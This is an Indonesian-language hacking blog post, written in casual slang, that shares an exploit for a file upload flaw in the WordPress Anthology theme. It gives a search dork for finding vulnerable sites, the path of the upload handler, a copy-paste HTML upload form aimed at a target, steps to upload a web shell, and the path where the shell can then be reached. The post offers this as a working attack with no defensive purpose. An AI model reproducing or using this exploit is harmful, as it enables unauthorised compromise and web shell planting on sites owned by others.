Exploit WordPress Anthology Themes Remote File Upload Vulnerability

Aloo Malam gengs, tengah malam gini masih ada yg idup gak nih ? wkwkw  :D
iseng2 share exploit lama, kali aja masih crotz awkakw.
yg dh master minggir dlu beb  :heart:

lanjot.

inurl:/wp-content/themes/Anthology/
(sisanya kembangin lagi, gunakan imajinasi vokever kalian, biar bisa dpt yang vuln and verawan).

exploit: /wp-content/themes/Anthology/functions/upload-handler.php

ciri2 vuln o.O ?
muncul error atau blank *kira2 sih gitu, maap kalo salah akwakawk



Copy Script CSRF Upload nya:

<form enctype="multipart/form-data" 
action="target.co.li/wp-content/themes/Anthology/functions/upload-handler.php" method="post">
Please choose a file: <input name="pexetofile" type="file" /><br />
<input type="submit" value="upload" />

</form>


jika sudah buka CSRF Upload nya, lalu upload deh file/shell kalian.
Jika Upload nya sukses nanti akan muncul nama file/shell kalian gengs :3



Shell Akses: target.co.li/wp-content/uploads/[year]/[month]/namashell.php



Done x_O

kunjungin blog saya juga ya gengs: TKJ Cyber Art


Sumur


semoga bermanfaat Gengs, maap kalo post cupu  :)
waktunya Nue dan tim Katakan Putus cabut dulu gengs, karna bsk masih Ujian Sekolah gengs wkwkwk.
bye ..